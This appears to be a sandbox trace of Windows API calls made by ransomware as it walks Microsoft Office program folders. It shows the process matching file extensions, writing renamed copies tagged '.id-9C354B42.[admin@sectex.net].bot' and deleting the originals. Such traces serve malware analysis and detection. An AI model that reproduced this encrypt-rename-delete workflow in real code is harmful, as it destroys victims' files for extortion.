	[0154.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL") returned 68
	[0154.274] lstrlenW (lpString=".1cd") returned 4
	[0154.274] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0154.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL") returned 68
	[0154.274] lstrlenW (lpString=".jpg") returned 4
	[0154.274] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0154.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL") returned 68
	[0154.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL") returned 68
	[0154.274] lstrlenW (lpString=".doc") returned 4
	[0154.274] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0154.274] lstrlenW (lpString=".docx") returned 5
	[0154.274] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0154.274] lstrlenW (lpString=".pdf") returned 4
	[0154.274] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0154.274] lstrlenW (lpString=".xls") returned 4
	[0154.274] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0154.274] lstrlenW (lpString=".xlsx") returned 5
	[0154.274] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0154.274] lstrlenW (lpString=".ppt") returned 4
	[0154.274] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0154.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL") returned 68
	[0154.274] lstrlenW (lpString=".zip") returned 4
	[0154.274] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0154.274] lstrlenW (lpString=".rar") returned 4
	[0154.275] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0154.275] lstrlenW (lpString=".bz2") returned 4
	[0154.275] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0154.275] lstrlenW (lpString=".7z") returned 3
	[0154.275] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL") returned 68
	[0154.275] lstrlenW (lpString=".dbf") returned 4
	[0154.275] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0154.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL") returned 68
	[0154.275] lstrlenW (lpString=".1cd") returned 4
	[0154.275] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0154.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.DLL.IDX_DLL") returned 68
	[0154.275] lstrlenW (lpString=".jpg") returned 4
	[0154.275] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0154.275] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0154.275] lstrlenW (lpString="XLINTL32.REST.IDX_DLL") returned 21
	[0154.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0154.416] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=383872) returned 1
	[0154.417] CloseHandle (hObject=0x3f8) returned 1
	[0154.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.rest.idx_dll")) returned 0x20
	[0154.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0154.417] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.417] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0154.418] GetLastError () returned 0x0
	[0154.418] ReadFile (in: hFile=0x3f8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x5db80, lpOverlapped=0x0) returned 1
	[0154.427] WriteFile (in: hFile=0x268, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x5db90, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x5db90, lpOverlapped=0x0) returned 1
	[0154.434] ReadFile (in: hFile=0x3f8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.434] WriteFile (in: hFile=0x268, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0154.434] SetEndOfFile (hFile=0x268) returned 1
	[0154.434] CloseHandle (hObject=0x268) returned 1
	[0154.434] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.434] SetEndOfFile (hFile=0x3f8) returned 1
	[0154.443] CloseHandle (hObject=0x3f8) returned 1
	[0154.443] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.443] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlintl32.rest.idx_dll")) returned 1
	[0154.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL") returned 69
	[0154.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL") returned 69
	[0154.444] lstrlenW (lpString=".doc") returned 4
	[0154.444] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0154.444] lstrlenW (lpString=".docx") returned 5
	[0154.444] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0154.444] lstrlenW (lpString=".pdf") returned 4
	[0154.444] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0154.444] lstrlenW (lpString=".xls") returned 4
	[0154.444] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0154.444] lstrlenW (lpString=".xlsx") returned 5
	[0154.444] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0154.444] lstrlenW (lpString=".ppt") returned 4
	[0154.444] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0154.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL") returned 69
	[0154.445] lstrlenW (lpString=".zip") returned 4
	[0154.445] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0154.445] lstrlenW (lpString=".rar") returned 4
	[0154.445] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0154.445] lstrlenW (lpString=".bz2") returned 4
	[0154.445] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0154.445] lstrlenW (lpString=".7z") returned 3
	[0154.445] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL") returned 69
	[0154.445] lstrlenW (lpString=".dbf") returned 4
	[0154.445] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0154.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL") returned 69
	[0154.445] lstrlenW (lpString=".1cd") returned 4
	[0154.445] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0154.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL") returned 69
	[0154.445] lstrlenW (lpString=".jpg") returned 4
	[0154.445] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0154.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL") returned 69
	[0154.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL") returned 69
	[0154.445] lstrlenW (lpString=".doc") returned 4
	[0154.445] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0154.445] lstrlenW (lpString=".docx") returned 5
	[0154.445] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0154.445] lstrlenW (lpString=".pdf") returned 4
	[0154.445] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0154.445] lstrlenW (lpString=".xls") returned 4
	[0154.445] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0154.445] lstrlenW (lpString=".xlsx") returned 5
	[0154.445] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0154.445] lstrlenW (lpString=".ppt") returned 4
	[0154.445] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0154.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL") returned 69
	[0154.446] lstrlenW (lpString=".zip") returned 4
	[0154.446] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0154.446] lstrlenW (lpString=".rar") returned 4
	[0154.446] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0154.446] lstrlenW (lpString=".bz2") returned 4
	[0154.446] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0154.446] lstrlenW (lpString=".7z") returned 3
	[0154.446] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL") returned 69
	[0154.446] lstrlenW (lpString=".dbf") returned 4
	[0154.446] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0154.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL") returned 69
	[0154.446] lstrlenW (lpString=".1cd") returned 4
	[0154.446] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0154.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLINTL32.REST.IDX_DLL") returned 69
	[0154.446] lstrlenW (lpString=".jpg") returned 4
	[0154.446] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0154.446] lstrcmpiW (lpString1=".ACL", lpString2=".bot") returned -1
	[0154.446] lstrlenW (lpString="MSO.ACL") returned 7
	[0154.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\mso.acl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0154.447] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=43558) returned 1
	[0154.447] CloseHandle (hObject=0x3f8) returned 1
	[0154.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\mso.acl")) returned 0x20
	[0154.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\mso.acl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\mso.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0154.448] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.448] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\mso.acl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0154.821] GetLastError () returned 0x0
	[0154.821] ReadFile (in: hFile=0x3f8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xaa26, lpOverlapped=0x0) returned 1
	[0154.942] WriteFile (in: hFile=0x388, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xaa30, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xaa30, lpOverlapped=0x0) returned 1
	[0154.943] ReadFile (in: hFile=0x3f8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.943] WriteFile (in: hFile=0x388, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0154.943] SetEndOfFile (hFile=0x388) returned 1
	[0155.480] CloseHandle (hObject=0x388) returned 1
	[0155.480] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.480] SetEndOfFile (hFile=0x3f8) returned 1
	[0155.751] CloseHandle (hObject=0x3f8) returned 1
	[0155.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.767] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\mso.acl")) returned 1
	[0155.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned 55
	[0155.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned 55
	[0155.768] lstrlenW (lpString=".doc") returned 4
	[0155.768] lstrcmpiW (lpString1=".doc", lpString2=".ACL") returned 1
	[0155.768] lstrlenW (lpString=".docx") returned 5
	[0155.768] lstrcmpiW (lpString1=".docx", lpString2="O.ACL") returned -1
	[0155.768] lstrlenW (lpString=".pdf") returned 4
	[0155.768] lstrcmpiW (lpString1=".pdf", lpString2=".ACL") returned 1
	[0155.768] lstrlenW (lpString=".xls") returned 4
	[0155.768] lstrcmpiW (lpString1=".xls", lpString2=".ACL") returned 1
	[0155.768] lstrlenW (lpString=".xlsx") returned 5
	[0155.768] lstrcmpiW (lpString1=".xlsx", lpString2="O.ACL") returned -1
	[0155.768] lstrlenW (lpString=".ppt") returned 4
	[0155.768] lstrcmpiW (lpString1=".ppt", lpString2=".ACL") returned 1
	[0155.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned 55
	[0155.768] lstrlenW (lpString=".zip") returned 4
	[0155.768] lstrcmpiW (lpString1=".zip", lpString2=".ACL") returned 1
	[0155.768] lstrlenW (lpString=".rar") returned 4
	[0155.768] lstrcmpiW (lpString1=".rar", lpString2=".ACL") returned 1
	[0155.768] lstrlenW (lpString=".bz2") returned 4
	[0155.768] lstrcmpiW (lpString1=".bz2", lpString2=".ACL") returned 1
	[0155.768] lstrlenW (lpString=".7z") returned 3
	[0155.768] lstrcmpiW (lpString1=".7z", lpString2="ACL") returned -1
	[0155.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned 55
	[0155.768] lstrlenW (lpString=".dbf") returned 4
	[0155.768] lstrcmpiW (lpString1=".dbf", lpString2=".ACL") returned 1
	[0155.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned 55
	[0155.769] lstrlenW (lpString=".1cd") returned 4
	[0155.769] lstrcmpiW (lpString1=".1cd", lpString2=".ACL") returned -1
	[0155.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned 55
	[0155.769] lstrlenW (lpString=".jpg") returned 4
	[0155.769] lstrcmpiW (lpString1=".jpg", lpString2=".ACL") returned 1
	[0155.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned 55
	[0155.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned 55
	[0155.769] lstrlenW (lpString=".doc") returned 4
	[0155.769] lstrcmpiW (lpString1=".doc", lpString2=".ACL") returned 1
	[0155.769] lstrlenW (lpString=".docx") returned 5
	[0155.769] lstrcmpiW (lpString1=".docx", lpString2="O.ACL") returned -1
	[0155.769] lstrlenW (lpString=".pdf") returned 4
	[0155.769] lstrcmpiW (lpString1=".pdf", lpString2=".ACL") returned 1
	[0155.769] lstrlenW (lpString=".xls") returned 4
	[0155.769] lstrcmpiW (lpString1=".xls", lpString2=".ACL") returned 1
	[0155.769] lstrlenW (lpString=".xlsx") returned 5
	[0155.769] lstrcmpiW (lpString1=".xlsx", lpString2="O.ACL") returned -1
	[0155.769] lstrlenW (lpString=".ppt") returned 4
	[0155.769] lstrcmpiW (lpString1=".ppt", lpString2=".ACL") returned 1
	[0155.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned 55
	[0155.769] lstrlenW (lpString=".zip") returned 4
	[0155.769] lstrcmpiW (lpString1=".zip", lpString2=".ACL") returned 1
	[0155.769] lstrlenW (lpString=".rar") returned 4
	[0155.769] lstrcmpiW (lpString1=".rar", lpString2=".ACL") returned 1
	[0155.769] lstrlenW (lpString=".bz2") returned 4
	[0155.769] lstrcmpiW (lpString1=".bz2", lpString2=".ACL") returned 1
	[0155.769] lstrlenW (lpString=".7z") returned 3
	[0155.769] lstrcmpiW (lpString1=".7z", lpString2="ACL") returned -1
	[0155.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned 55
	[0155.769] lstrlenW (lpString=".dbf") returned 4
	[0155.770] lstrcmpiW (lpString1=".dbf", lpString2=".ACL") returned 1
	[0155.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned 55
	[0155.770] lstrlenW (lpString=".1cd") returned 4
	[0155.770] lstrcmpiW (lpString1=".1cd", lpString2=".ACL") returned -1
	[0155.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned 55
	[0155.770] lstrlenW (lpString=".jpg") returned 4
	[0155.770] lstrcmpiW (lpString1=".jpg", lpString2=".ACL") returned 1
	[0155.770] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0155.770] lstrlenW (lpString="ACCDDSF.DLL") returned 11
	[0155.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accddsf.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0155.792] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=579488) returned 1
	[0155.792] CloseHandle (hObject=0x3b0) returned 1
	[0155.792] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accddsf.dll")) returned 0x20
	[0155.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\accddsf.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accddsf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0155.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned 54
	[0155.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned 54
	[0155.934] lstrlenW (lpString=".doc") returned 4
	[0155.934] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.934] lstrlenW (lpString=".docx") returned 5
	[0155.934] lstrcmpiW (lpString1=".docx", lpString2="F.DLL") returned -1
	[0155.934] lstrlenW (lpString=".pdf") returned 4
	[0155.934] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.934] lstrlenW (lpString=".xls") returned 4
	[0155.934] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.934] lstrlenW (lpString=".xlsx") returned 5
	[0155.934] lstrcmpiW (lpString1=".xlsx", lpString2="F.DLL") returned -1
	[0155.935] lstrlenW (lpString=".ppt") returned 4
	[0155.935] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned 54
	[0155.935] lstrlenW (lpString=".zip") returned 4
	[0155.935] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.935] lstrlenW (lpString=".rar") returned 4
	[0155.935] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.935] lstrlenW (lpString=".bz2") returned 4
	[0155.935] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.935] lstrlenW (lpString=".7z") returned 3
	[0155.935] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned 54
	[0155.935] lstrlenW (lpString=".dbf") returned 4
	[0155.935] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0155.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned 54
	[0155.935] lstrlenW (lpString=".1cd") returned 4
	[0155.935] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0155.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned 54
	[0155.935] lstrlenW (lpString=".jpg") returned 4
	[0155.935] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0155.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned 54
	[0155.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned 54
	[0155.935] lstrlenW (lpString=".doc") returned 4
	[0155.935] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.935] lstrlenW (lpString=".docx") returned 5
	[0155.935] lstrcmpiW (lpString1=".docx", lpString2="F.DLL") returned -1
	[0155.935] lstrlenW (lpString=".pdf") returned 4
	[0155.935] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.935] lstrlenW (lpString=".xls") returned 4
	[0155.935] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.936] lstrlenW (lpString=".xlsx") returned 5
	[0155.936] lstrcmpiW (lpString1=".xlsx", lpString2="F.DLL") returned -1
	[0155.936] lstrlenW (lpString=".ppt") returned 4
	[0155.936] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned 54
	[0155.936] lstrlenW (lpString=".zip") returned 4
	[0155.936] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.936] lstrlenW (lpString=".rar") returned 4
	[0155.936] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.936] lstrlenW (lpString=".bz2") returned 4
	[0155.936] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.936] lstrlenW (lpString=".7z") returned 3
	[0155.936] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned 54
	[0155.936] lstrlenW (lpString=".dbf") returned 4
	[0155.936] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0155.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned 54
	[0155.936] lstrlenW (lpString=".1cd") returned 4
	[0155.936] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0155.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCDDSF.DLL") returned 54
	[0155.936] lstrlenW (lpString=".jpg") returned 4
	[0155.936] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0155.936] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0155.936] lstrlenW (lpString="otkloadr_x64.dll") returned 16
	[0155.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\otkloadr_x64.dll" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\otkloadr_x64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0155.937] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=152392) returned 1
	[0155.937] CloseHandle (hObject=0x388) returned 1
